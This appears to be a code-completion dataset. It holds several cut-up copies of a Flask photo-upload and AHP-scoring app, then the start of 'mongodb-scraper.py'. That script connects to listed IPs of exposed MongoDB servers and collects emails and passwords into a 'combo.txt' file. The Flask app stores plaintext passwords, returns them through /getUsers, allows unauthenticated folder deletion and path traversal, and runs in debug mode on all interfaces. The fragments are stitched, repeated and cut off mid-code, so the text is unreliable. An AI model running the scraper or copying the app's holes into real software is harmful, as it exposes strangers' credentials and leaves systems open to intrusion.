return jsonify({'status':'ok','info':'%s注册成功'%username,'session':username,'role':1})
@app.route('/getTask', methods=['GET'])
def get_task():
tasks = Task.query.order_by(Task.create_time.desc()).all()
return jsonify(tasks)
@app.route('/getUsers', methods=['GET'])
def get_users():
users = User.query.all()
return jsonify(users)
@app.route('/deleteTask/<task_id>', methods=['GET'])
def delete_task(task_id):
task = Task.query.filter_by(id=task_id).first()
folder_name = address + task.folder_name
shutil.rmtree(path=folder_name)
Task.query.filter_by(id=task_id).delete()
db.session.commit()
return jsonify('success')
@app.route('/updateTask', methods=['POST'])
def update_task():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
task_id = json_data.get("id")
user_id = json_data.get("user_id")
status = json_data.get("status")
folder_name = json_data.get("folder_name")
if int(status) == 2:
files_list = os.listdir(address + str(folder_name))
create_excel(len(files_list), address + str(folder_name))
task = Task.query.filter_by(id=task_id).first()
task.user_id = user_id
task.status = status
db.session.commit()
# user_id = request.headers.get('Authorization',None)
users = User.query.all()
return jsonify(users)
class User(db.Model):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
username = db.Column(db.String(100), nullable=False)
password = db.Column(db.String(100), nullable=False)
role = db.Column(db.String(100), nullable=False)
def keys(self):
return ['id', 'username', 'password', 'role']
def __getitem__(self, item):
return getattr(self, item)
class Task(db.Model):
__tablename__ = 'task'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
user_id = db.Column(db.String(100), nullable=False)
folder_name = db.Column(db.String(100), nullable=False)
status = db.Column(db.String(100), nullable=False)
size = db.Column(db.String(100), nullable=False)
place = db.Column(db.String(100), nullable=False)
create_time = db.Column(db.DateTime, nullable=False) # 发送时间
def keys(self):
return ['id', 'user_id', 'folder_name', 'status', 'size', 'place', 'create_time']
def __getitem__(self, item):
return getattr(self, item) | random_line_split |
|
app.py | # -*- coding: utf-8 -*-
import os
from datetime import datetime
import numpy as np
import shutil
from flask import Flask, render_template, redirect, url_for, request, session, send_from_directory, Response
from flask_uploads import UploadSet, configure_uploads, IMAGES, patch_request_class
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileRequired, FileAllowed
from wtforms import SubmitField
import xlsxwriter
import xlrd
from xlutils.copy import copy
from flask import jsonify
import openpyxl
import json
from util.AHP import AHP
from flask_sqlalchemy import SQLAlchemy
import config
from flask.json import JSONEncoder as _JSONEncoder
class JSONEncoder(_JSONEncoder):
def default(self, o):
if isinstance(o, datetime):
return int(o.timestamp())
if hasattr(o, 'keys') and hasattr(o, '__getitem__'):
return dict(o)
raise None
app = Flask(__name__)
app.json_encoder = JSONEncoder
app.config.from_object(config)
app.config['SECRET_KEY'] = 'I have a dream'
address = 'C:\\Users\\Administrator\\Desktop\\images\\static\\'
app.config['UPLOADED_PHOTOS_DEST'] = address
app.config['MAX_CONTENT_LENGTH'] = 200 * 1024 * 1024
db = SQLAlchemy(app)
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
patch_request_class(app, size=None) # set maximum file size, default is 16MB
class UploadForm(FlaskForm):
photo = FileField(validators=[FileAllowed(photos, u'只能是照片格式!'), FileRequired(u'Choose a file!')])
submit = SubmitField(u'上传')
@app.route('/', methods=['GET', 'POST'])
def index():
return render_template('index.html')
@app.route('/index', methods=['GET', 'POST'])
def upload_file():
folder_name = request.form.get('folderName')
# form = UploadForm()
folder = address + folder_name
tasks = Task.query.filter_by(folder_name=folder_name).all()
if len(tasks) == 0:
task = Task(folder_name=folder_name, size=len(request.files.getlist('photo')), status='0', place='1-2', create_time=datetime.now())
# 调用添加方法
db.session.add(task)
db.session.commit()
else:
task = Task.query.filter_by(folder_name=folder_name).first()
task.size = str(int(task.size) + len(request.files.getlist('photo')))
db.session.commit()
if not os.path.exists(folder):
os.makedirs(folder)
full_path = folder + '\\names.txt'
file = open(full_path, 'a')
# create_excel(len(request.files.getlist('photo')))
for filename in request.files.getlist('photo'):
name = filename.filename
file.write(name + '\n')
photos.save(filename, folder=folder, name=name)
task = Task.query.filter_by(folder_name=folder_name).first()
return jsonify(task)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8 | thods=['GET', 'POST'])
def page_list():
user_id = request.headers.get('Authorization',None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
if not os.path.exists(folder_name):
return jsonify(0)
files_list = os.listdir(folder_name)
return jsonify(len(files_list) - 3)
def create_excel(size, folder_name):
# 新建一个Excel文件
wb = openpyxl.Workbook()
ws1 = wb.active
for i in range(size - 1):
ws1.cell(row=i+1, column=i+1, value=1)
wb.save((folder_name + '\\data.xlsx'))
workbook = xlsxwriter.Workbook(folder_name + '\\result.xlsx')
workbook.close()
@app.route('/submit', methods=['GET', 'POST'])
def submit():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.status = 3
db.session.commit()
folder_name = address + task.folder_name
filename = folder_name + "\\data.xlsx"
arr = []
ex = xlrd.open_workbook(filename).sheets()[0]
for i in range(ex.nrows):
col = ex.row_values(i)
for index, n in enumerate(col):
if isinstance(n, str):
col[index] = 0
arr.append(col)
M = np.array(arr)
obj = AHP(M)
evec = obj.get_evec(obj.supp_mat(M))
obj.save_result(evec, folder_name)
return jsonify("success")
@app.route('/update_excel/<row>/<line>/<value>', methods=['GET', 'POST'])
def update_excel(row, line, value):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.place = str(row) + '-' + str(line)
db.session.commit()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
xls = xlrd.open_workbook(folder_name + '\\data.xlsx')
xlsc = copy(xls)
shtc = xlsc.get_sheet(0)
shtc.write(int(row), int(line), int(value))
xlsc.save(folder_name + '\\data.xlsx')
return jsonify("success")
@app.route('/open/<filename>', methods=['GET', 'POST'])
def open_file(filename):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
line = getline(folder_name + "\\names.txt", int(filename))
name = line.replace("\n", "")
global app
app.config['UPLOADED_PHOTOS_DEST'] = folder_name
global photos
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
file_url = photos.url(name)
return jsonify(file_url)
@app.route('/delete/<filename>')
def delete_file(filename):
file_path = photos.path(filename)
os.remove(file_path)
return render_template('manage.html', files_list=files_list)
@app.route('/download/<folder_name>/<filename>', methods=['GET', 'POST'])
def download(folder_name, filename):
folder_name = address + folder_name
# filename = folder_name + "\\data.xlsx"
# arr = []
# ex = xlrd.open_workbook(filename).sheets()[0]
# for i in range(ex.nrows):
# col = ex.row_values(i)
# for index, n in enumerate(col):
# if isinstance(n, str):
# col[index] = 0
# arr.append(col)
# M = np.array(arr)
# obj = AHP(M)
# evec = obj.get_evec(obj.supp_mat(M))
# obj.save_result(evec, folder_name)
return send_from_directory(folder_name, filename=filename, as_attachment=True)
@app.route('/getTaskBean', methods=['GET'])
def get_task_bean():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
return jsonify(task)
def getline(the_file_path, line_number):
if line_number < 1:
return ''
for cur_line_number, line in enumerate(open(the_file_path, 'rU')):
if cur_line_number == line_number-1:
return line
return ''
@app.route('/getValue/<row>/<line>', methods=['GET', 'POST'])
def get_excel(row, line):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
x1 = xlrd.open_workbook(folder_name + '\\data.xlsx')
sheet1 = x1.sheet_by_index(0)
a12 = sheet1.cell_value(row, line)
return jsonify(a12)
@app.route('/login', methods=['POST'])
def login():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
user = User.query.filter_by(username=username, password=password).all()
if len(user) == 1:
return jsonify({'status':'ok','info':'%s登录成功'%username,'session':user[0].id,'role':user[0].role})
return jsonify({'status':'no','info':'登录失败'})
@app.route('/registry', methods=['POST'])
def registry():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
users = User.query.filter_by(username=username).all()
if len(users) > 0:
return jsonify({'status':'no','info':'%s注册失败'%username})
else:
user = User(username=username, password=password, role=1)
# 调用添加方法
db.session.add(user)
db.session.commit()
return jsonify({'status':'ok','info':'%s注册成功'%username,'session':username,'role':1})
@app.route('/getTask', methods=['GET'])
def get_task():
tasks = Task.query.order_by(Task.create_time.desc()).all()
return jsonify(tasks)
@app.route('/getUsers', methods=['GET'])
def get_users():
users = User.query.all()
return jsonify(users)
@app.route('/deleteTask/<task_id>', methods=['GET'])
def delete_task(task_id):
task = Task.query.filter_by(id=task_id).first()
folder_name = address + task.folder_name
shutil.rmtree(path=folder_name)
Task.query.filter_by(id=task_id).delete()
db.session.commit()
return jsonify('success')
@app.route('/updateTask', methods=['POST'])
def update_task():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
task_id = json_data.get("id")
user_id = json_data.get("user_id")
status = json_data.get("status")
folder_name = json_data.get("folder_name")
if int(status) == 2:
files_list = os.listdir(address + str(folder_name))
create_excel(len(files_list), address + str(folder_name))
task = Task.query.filter_by(id=task_id).first()
task.user_id = user_id
task.status = status
db.session.commit()
# user_id = request.headers.get('Authorization',None)
users = User.query.all()
return jsonify(users)
class User(db.Model):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
username = db.Column(db.String(100), nullable=False)
password = db.Column(db.String(100), nullable=False)
role = db.Column(db.String(100), nullable=False)
def keys(self):
return ['id', 'username', 'password', 'role']
def __getitem__(self, item):
return getattr(self, item)
class Task(db.Model):
__tablename__ = 'task'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
user_id = db.Column(db.String(100), nullable=False)
folder_name = db.Column(db.String(100), nullable=False)
status = db.Column(db.String(100), nullable=False)
size = db.Column(db.String(100), nullable=False)
place = db.Column(db.String(100), nullable=False)
create_time = db.Column(db.DateTime, nullable=False) # 发送时间
def keys(self):
return ['id', 'user_id', 'folder_name', 'status', 'size', 'place', 'create_time']
def __getitem__(self, item):
return getattr(self, item)
| 080, debug=True)
# app.run(debug=True)
@app.route('/page_list', me | conditional_block |
app.py | # -*- coding: utf-8 -*-
import os
from datetime import datetime
import numpy as np
import shutil
from flask import Flask, render_template, redirect, url_for, request, session, send_from_directory, Response
from flask_uploads import UploadSet, configure_uploads, IMAGES, patch_request_class
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileRequired, FileAllowed
from wtforms import SubmitField
import xlsxwriter
import xlrd
from xlutils.copy import copy
from flask import jsonify
import openpyxl
import json
from util.AHP import AHP
from flask_sqlalchemy import SQLAlchemy
import config
from flask.json import JSONEncoder as _JSONEncoder
class JSONEncoder(_JSONEncoder):
def default(self, o):
if isinstance(o, datetime):
return int(o.timestamp())
if hasattr(o, 'keys') and hasattr(o, '__getitem__'):
return dict(o)
raise None
app = Flask(__name__)
app.json_encoder = JSONEncoder
app.config.from_object(config)
app.config['SECRET_KEY'] = 'I have a dream'
address = 'C:\\Users\\Administrator\\Desktop\\images\\static\\'
app.config['UPLOADED_PHOTOS_DEST'] = address
app.config['MAX_CONTENT_LENGTH'] = 200 * 1024 * 1024
db = SQLAlchemy(app)
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
patch_request_class(app, size=None) # set maximum file size, default is 16MB
class UploadForm(FlaskForm):
photo = FileField(validators=[FileAllowed(photos, u'只能是照片格式!'), FileRequired(u'Choose a file!')])
submit = SubmitField(u'上传')
@app.route('/', methods=['GET', 'POST'])
def index():
return render_template('index.html')
@app.route('/index', methods=['GET', 'POST'])
def upload_file():
folder_name = request.form.get('folderName')
# form = UploadForm()
folder = address + folder_name
tasks = Task.query.filter_by(folder_name=folder_name).all()
if len(tasks) == 0:
task = Task(folder_name=folder_name, size=len(request.files.getlist('photo')), status='0', place='1-2', create_time=datetime.now())
# 调用添加方法
db.session.add(task)
db.session.commit()
else:
task = Task.query.filter_by(folder_name=folder_name).first()
task.size = str(int(task.size) + len(request.files.getlist('photo')))
db.session.commit()
if not os.path.exists(folder):
os.makedirs(folder)
full_path = folder + '\\names.txt'
file = open(full_path, 'a')
# create_excel(len(request.files.getlist('photo')))
for filename in request.files.getlist('photo'):
name = filename.filename
file.write(name + '\n')
photos.save(filename, folder=folder, name=name)
task = Task.query.filter_by(folder_name=folder_name).first()
return jsonify(task)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080, debug=True)
# app.run(debug=True)
@app.route('/page_list', methods=['GET', 'POST'])
def page_list():
user_id = request.headers.get('Authorization',None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
if not os.path.exists(folder_name):
return jsonify(0)
files_list = os.listdir(folder_name)
return jsonify(len(files_list) - 3)
def create_excel(size, folder_name):
# 新建一个Excel文件
wb = openpyxl.Workbook()
ws1 = wb.active
for i in range(size - 1):
ws1.cell(row=i+1, column=i+1, value=1)
wb.save((folder_name + '\\data.xlsx'))
workbook = xlsxwriter.Workbook(folder_name + '\\result.xlsx')
workbook.close()
@app.route('/submit', methods=['GET', 'POST'])
def submit():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.status = 3
db.session.commit()
folder_name = address + task.folder_name
filename = folder_name + "\\data.xlsx"
arr = []
ex = xlrd.open_workbook(filename).sheets()[0]
for i in range(ex.nrows):
col = ex.row_values(i)
for index, n in enumerate(col):
if isinstance(n, str):
col[index] = 0
arr.append(col)
M = np.array(arr)
obj = AHP(M)
evec = obj.get_evec(obj.supp_mat(M))
obj.save_result(evec, folder_name)
return jsonify("success")
@app.route('/update_excel/<row>/<line>/<value>', methods=['GET', 'POST'])
def update_excel(row, line, value):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.place = str(row) + '-' + str(line)
db.session.commit()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
xls = xlrd.open_workbook(folder_name + '\\data.xlsx')
xlsc = copy(xls)
shtc = xlsc.get_sheet(0)
shtc.write(int(row), int(line), int(value))
xlsc.save(folder_name + '\\data.xlsx')
return jsonify("success")
@app.route('/open/<filename>', methods=['GET', 'POST'])
def open_file(filename):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
line = getline(folder_name + "\\names.txt", int(filename))
name = line.replace("\n", "")
global app
app.config['UPLOADED_PHOTOS_DEST'] = folder_name
global photos
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
file_url = photos.url(name)
return jsonify(file_url)
@app.route('/delete/<filename>')
def delete_file(filename):
file_path = photos.path(filename)
os.remove(file_path)
return render_template('manage.html', files_list=files_list)
@app.route('/download/<folder_name>/<filename>', methods=['GET', 'POST'])
def download(folder_name, filename):
folder_name = address + folder_name
# filename = folder_name + "\\data.xlsx"
# arr = []
# ex = xlrd.open_workbook(filename).sheets()[0]
# for i in range(ex.nrows):
# col = ex.row_values(i)
# for index, n in enumerate(col):
# if isinstance(n, str):
# col[index] = 0
# arr.append(col)
# M = np.array(arr)
# obj = AHP(M)
# evec = obj.get_evec(obj.supp_mat(M))
# obj.save_result(evec, folder_name)
return send_from_directory(folder_name, filename=filename, as_attachment=True)
@app.route('/getTaskBean', methods=['GET'])
def get_task_bean():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
return jsonify(task)
def getline(the_file_path, line_number):
if line_number < 1:
return ''
| thods=['GET', 'POST'])
def get_excel(row, line):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
x1 = xlrd.open_workbook(folder_name + '\\data.xlsx')
sheet1 = x1.sheet_by_index(0)
a12 = sheet1.cell_value(row, line)
return jsonify(a12)
@app.route('/login', methods=['POST'])
def login():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
user = User.query.filter_by(username=username, password=password).all()
if len(user) == 1:
return jsonify({'status':'ok','info':'%s登录成功'%username,'session':user[0].id,'role':user[0].role})
return jsonify({'status':'no','info':'登录失败'})
@app.route('/registry', methods=['POST'])
def registry():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
users = User.query.filter_by(username=username).all()
if len(users) > 0:
return jsonify({'status':'no','info':'%s注册失败'%username})
else:
user = User(username=username, password=password, role=1)
# 调用添加方法
db.session.add(user)
db.session.commit()
return jsonify({'status':'ok','info':'%s注册成功'%username,'session':username,'role':1})
@app.route('/getTask', methods=['GET'])
def get_task():
tasks = Task.query.order_by(Task.create_time.desc()).all()
return jsonify(tasks)
@app.route('/getUsers', methods=['GET'])
def get_users():
users = User.query.all()
return jsonify(users)
@app.route('/deleteTask/<task_id>', methods=['GET'])
def delete_task(task_id):
task = Task.query.filter_by(id=task_id).first()
folder_name = address + task.folder_name
shutil.rmtree(path=folder_name)
Task.query.filter_by(id=task_id).delete()
db.session.commit()
return jsonify('success')
@app.route('/updateTask', methods=['POST'])
def update_task():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
task_id = json_data.get("id")
user_id = json_data.get("user_id")
status = json_data.get("status")
folder_name = json_data.get("folder_name")
if int(status) == 2:
files_list = os.listdir(address + str(folder_name))
create_excel(len(files_list), address + str(folder_name))
task = Task.query.filter_by(id=task_id).first()
task.user_id = user_id
task.status = status
db.session.commit()
# user_id = request.headers.get('Authorization',None)
users = User.query.all()
return jsonify(users)
class User(db.Model):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
username = db.Column(db.String(100), nullable=False)
password = db.Column(db.String(100), nullable=False)
role = db.Column(db.String(100), nullable=False)
def keys(self):
return ['id', 'username', 'password', 'role']
def __getitem__(self, item):
return getattr(self, item)
class Task(db.Model):
__tablename__ = 'task'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
user_id = db.Column(db.String(100), nullable=False)
folder_name = db.Column(db.String(100), nullable=False)
status = db.Column(db.String(100), nullable=False)
size = db.Column(db.String(100), nullable=False)
place = db.Column(db.String(100), nullable=False)
create_time = db.Column(db.DateTime, nullable=False) # 发送时间
def keys(self):
return ['id', 'user_id', 'folder_name', 'status', 'size', 'place', 'create_time']
def __getitem__(self, item):
return getattr(self, item)
| for cur_line_number, line in enumerate(open(the_file_path, 'rU')):
if cur_line_number == line_number-1:
return line
return ''
@app.route('/getValue/<row>/<line>', me | identifier_body |
app.py | # -*- coding: utf-8 -*-
import os
from datetime import datetime
import numpy as np
import shutil
from flask import Flask, render_template, redirect, url_for, request, session, send_from_directory, Response
from flask_uploads import UploadSet, configure_uploads, IMAGES, patch_request_class
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileRequired, FileAllowed
from wtforms import SubmitField
import xlsxwriter
import xlrd
from xlutils.copy import copy
from flask import jsonify
import openpyxl
import json
from util.AHP import AHP
from flask_sqlalchemy import SQLAlchemy
import config
from flask.json import JSONEncoder as _JSONEncoder
class JSONEncoder(_JSONEncoder):
def default(self, o):
if isinstance(o, datetime):
return int(o.timestamp())
if hasattr(o, 'keys') and hasattr(o, '__getitem__'):
return dict(o)
raise None
app = Flask(__name__)
app.json_encoder = JSONEncoder
app.config.from_object(config)
app.config['SECRET_KEY'] = 'I have a dream'
address = 'C:\\Users\\Administrator\\Desktop\\images\\static\\'
app.config['UPLOADED_PHOTOS_DEST'] = address
app.config['MAX_CONTENT_LENGTH'] = 200 * 1024 * 1024
db = SQLAlchemy(app)
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
patch_request_class(app, size=None) # set maximum file size, default is 16MB
class UploadForm(FlaskForm):
photo = FileField(validators=[FileAllowed(photos, u'只能是照片格式!'), FileRequired(u'Choose a file!')])
submit = SubmitField(u'上传')
@app.route('/', methods=['GET', 'POST'])
def index():
return render_template('index.html')
@app.route('/index', methods=['GET', 'POST'])
def upload_file():
folder_name = request.form.get('folderName')
# form = UploadForm()
folder = address + folder_name
tasks = Task.query.filter_by(folder_name=folder_name).all()
if len(tasks) == 0:
task = Task(folder_name=folder_name, size=len(request.files.getlist('photo')), status='0', place='1-2', create_time=datetime.now())
# 调用添加方法
db.session.add(task)
db.session.commit()
else:
task = Task.query.filter_by(folder_name=folder_name).first()
task.size = str(int(task.size) + len(request.files.getlist('photo')))
db.session.commit()
if not os.path.exists(folder):
os.makedirs(folder)
full_path = folder + '\\names.txt'
file = open(full_path, 'a')
# create_excel(len(request.files.getlist('photo')))
for filename in request.files.getlist('photo'):
name = filename.filename
file.write(name + '\n')
photos.save(filename, folder=folder, name=name)
task = Task.query.filter_by(folder_name=folder_name).first()
return jsonify(task)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080, debug=True)
# app.run(debug=True)
@app.route('/page_list', methods=['GET', 'POST'])
def page_list():
user_id = request.headers.get('Authorization',None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
if not os.path.exists(folder_name):
return jsonify(0)
files_list = os.listdir(folder_name)
return jsonify(len(files_list) - 3)
def create_excel(size, folder_name):
# 新建一个Excel文件
wb = openpyxl.Workbook()
ws1 = wb.active
for i in range(size - 1):
ws1.cell(row=i+1, column=i+1, value=1)
wb.save((folder_name + '\\data.xlsx'))
workbook = xlsxwriter.Workbook(folder_name + '\\result.xlsx')
workbook.close()
@app.route('/submit', methods=['GET', 'POST'])
def submit():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.status = 3
db.session.commit()
folder_name = address + task.folder_name
filename = folder_name + "\\data.xlsx"
arr = []
ex = xlrd.open_workbook(filename).sheets()[0]
for i in range(ex.nrows):
col = ex.row_values(i)
for index, n in enumerate(col):
if isinstance(n, str):
col[index] = 0
arr.append(col)
M = np.array(arr)
obj = AHP(M)
evec = obj.get_evec(obj.supp_mat(M))
obj.save_result(evec, folder_name)
return jsonify("success")
@app.route('/update_excel/<row>/<line>/<value>', methods=['GET', 'POST'])
def update_excel(row, line, value):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.place = str(row) + '-' + str(line)
db.session.commit()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
xls = xlrd.open_workbook(folder_name + '\\data.xlsx')
xlsc = copy(xls)
shtc = xlsc.get_sheet(0)
shtc.write(int(row), int(line), int(value))
xlsc.save(folder_name + '\\data.xlsx')
return jsonify("success")
@app.route('/open/<filename>', methods=['GET', 'POST'])
def open_file(filename):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
line = getline(folder_name + "\\names.txt", int(filename))
name = line.replace("\n", "")
global app
app.config['UPLOADED_PHOTOS_DEST'] = folder_name
global photos
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
file_url = photos.url(name)
return jsonify(file_url)
@app.route('/delete/<filename>')
def delete_file(filename):
file_path = photos.path(filename)
os.remove(file_path)
return render_template('manage.html', files_list=files_list)
@app.route('/download/<folder_name>/<filename>', methods=['GET', 'POST'])
def download(folder_name, filename):
folder_name = address + folder_name
# filename = folder_name + "\\data.xlsx"
# arr = []
# ex = xlrd.open_workbook(filename).sheets()[0]
# for i in range(ex.nrows):
# col = ex.row_values(i)
# for index, n in enumerate(col):
# if isinstance(n, str):
# col[index] = 0
# arr.append(col)
# M = np.array(arr)
# obj = AHP(M)
# evec = obj.get_evec(obj.supp_mat(M))
# obj.save_result(evec, folder_name)
return send_from_directory(folder_name, filename=filename, as_attachment=True)
@app.route('/getTaskBean', methods=['GET'])
def get_task_bean():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
return jsonify(task)
def getline(the_file_path, line_number):
if line_number < 1:
return ''
for cur_line_number, line in enumerate(open(the_file_path, 'rU')):
if cur_line_number == line_number-1:
return line
return ''
@app.route('/getValue/<row>/<line>', methods=['GET', 'POST'])
def get_excel(row, line):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
x1 = xlrd.open_workbook(folder_name + '\\data.xlsx')
sheet1 = x1.sheet_by_index(0)
a12 = sheet1.cell_value(row, line)
return jsonify(a12)
@app.route('/login', methods=['POST'])
def login():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
user = User.query.filter_by(username=username, password=password).all()
if len(user) == 1:
return jsonify({'status':'ok','info':'%s登录成功'%username,'session':user[0].id,'role':user[0].role})
return jsonify({'status':'no','info':'登录失败'})
@app.route('/registry', methods=['POST'])
def registry():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
users = User.query.filter_by(username=username).all()
if len(users) > 0:
return jsonify({'status':'no','info':'%s注册失败'%username})
else:
user = User(username=username, password=password, role=1)
# 调用添加方法
db.session.add(user)
db.session.commit()
return jsonify({'status':'ok','info':'%s注册成功'%username,'session':username,'role':1})
@app.route('/getTask', methods=['GET'])
def get_task():
tasks = Task.query.order_by(Task.create_time.desc()).all()
return jsonify(tasks)
@app.route('/getUsers', methods=['GET'])
def get_users():
users = User.query.all()
return jsonify(users)
@app.route('/deleteTask/<task_id>', methods=['GET'])
def delete_task(task_id):
task = Task.query.filter_by(id=task_id).first()
folder_name = address + task.folder_name
shutil.rmtree(path=folder_name)
Task.query.filter_by(id=task_id).delete()
db.session.commit()
return jsonify('success')
@app.route('/updateTask', methods=['POST'])
def update_task():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
task_id = json_data.get("id")
user_id = json_data.get("user_id")
status = json_data.get("status")
folder_name = json_data.get("folder_name")
if int(status) == 2:
files_list = os.listdir(address + str(folder_name))
create_excel(len(files_list), address + str(folder_name))
task = Task.query.filter_by(id=task_id).first()
task.user_id = user_id
task.status = status
db.session.commit()
# user_id = request.headers.get('Authorization',None)
users = User.query.all()
return jsonify(users)
class User(db.Model):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key= | , autoincrement=True)
username = db.Column(db.String(100), nullable=False)
password = db.Column(db.String(100), nullable=False)
role = db.Column(db.String(100), nullable=False)
def keys(self):
return ['id', 'username', 'password', 'role']
def __getitem__(self, item):
return getattr(self, item)
class Task(db.Model):
__tablename__ = 'task'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
user_id = db.Column(db.String(100), nullable=False)
folder_name = db.Column(db.String(100), nullable=False)
status = db.Column(db.String(100), nullable=False)
size = db.Column(db.String(100), nullable=False)
place = db.Column(db.String(100), nullable=False)
create_time = db.Column(db.DateTime, nullable=False) # 发送时间
def keys(self):
return ['id', 'user_id', 'folder_name', 'status', 'size', 'place', 'create_time']
def __getitem__(self, item):
return getattr(self, item)
| True | identifier_name |
mongodb-scraper.py | # coding=utf-8
import argparse
import logging
import logging.handlers
import json
import re
from colorlog import ColoredFormatter
from pymongo import MongoClient
from pymongo import errors as mongo_errors
import io
import os
import smtplib
from email.mime.text import MIMEText
class MongodbScraper:
def __init__(self):
# Init class variables
self.settings = {}
self.ips = []
self.processed = []
self.table_names = ['account', 'user', 'subscriber', 'customer']
self.column_names = ['pass', 'pwd']
self.email_regex = re.compile(r'[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}')
self.filename = 'combo.txt'
# Init the logger
self.logger = logging.getLogger('mongodb-scraper')
self.logger.setLevel(logging.DEBUG)
# Create a rotation logging, so we won't have and endless file
rotate = logging.handlers.RotatingFileHandler(
'mongodb-scraper.log', maxBytes=(5 * 1024 * 1024), backupCount=3)
rotate.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s|%(levelname)-8s| %(message)s')
rotate.setFormatter(formatter)
self.logger.addHandler(rotate)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = ColoredFormatter("%(log_color)s%(asctime)s|[%(levelname)-4s] %(message)s%(reset)s", "%H:%M:%S")
console.setFormatter(formatter)
self.logger.addHandler(console)
# Check that the data dir exists
if not os.path.exists('data'):
os.makedirs('data')
# Load previous data
self._load_data()
# Let's parse some CLI options
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--skip', help='Supply a comma separated string of IPs that should be skipped')
arguments = parser.parse_args()
if arguments.skip:
skip = arguments.skip.split(',')
self.processed += skip
# Load settings
self._load_settings()
def _load_data(self):
self.logger.info("Opening data")
try:
with open('data.json', 'r') as data_json:
self.ips = json.load(data_json)
except (IOError, ValueError):
raise RuntimeError("Please provide a valid JSON encoded file in data.json")
self.logger.info("Found " + str(len(self.ips)) + " IPs to connect")
try:
with open('processed.json', 'r') as processed_json:
self.processed = json.load(processed_json)
except (IOError, ValueError):
# Meh, I'll live with that...
pass
if self.processed:
self.logger.info("Found " + str(len(self.processed)) + " already processed IP")
def _load_settings(self):
try:
with open('settings.json', 'r') as settings_json:
self.settings = json.load(settings_json)
self.logger.info("Settings file found")
except (IOError, ValueError):
self.logger.info("Settings file not found")
def _notify(self, ip, collection, count):
|
def _check_datafile(self):
size = 0
if os.path.exists('data/' + self.filename):
size = os.path.getsize('data/' + self.filename)
# Did the file grow too large?
if size > (20 * 1024 * 1024):
i = 0
while i < 100:
i += 1
combo_file = 'combo_' + str(i) + '.txt'
if not os.path.exists('data/' + combo_file):
self.filename = combo_file
break
def scrape(self):
for ip in self.ips:
# Do I have already processed this IP?
if ip in self.processed:
continue
self.logger.info("Connecting to " + ip)
try:
client = MongoClient(ip, connectTimeoutMS=5000)
dbs = client.database_names()
except (KeyboardInterrupt, SystemExit):
